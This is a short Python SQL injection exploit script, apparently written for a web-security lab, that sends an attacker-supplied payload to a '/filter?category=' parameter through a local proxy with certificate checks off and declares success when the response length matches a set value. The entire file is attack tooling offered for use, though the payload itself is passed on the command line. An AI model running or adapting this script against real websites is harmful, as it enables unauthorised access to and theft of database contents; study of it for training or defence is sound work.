import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8232', 'https': 'http://127.0.0.1:8232'}


def sqli_exploit(url, payload):
    uri = "/filter?category="
    r = requests.get(url + uri + payload, proxies=proxies, verify=False)
    print(r)
    print(r.headers)
    print(r.text)
    if r.headers['Content-Length'] == '3652' and r.status_code == 200:
        return True
    return False


if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        payload = sys.argv[2].strip()
    except IndexError:
        print("[-] Usage: %s <URL> <SQLi payload>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)

    if sqli_exploit(url, payload):
        print("[+] Exploit successful")
    else:
        print("[-] Exploit failed")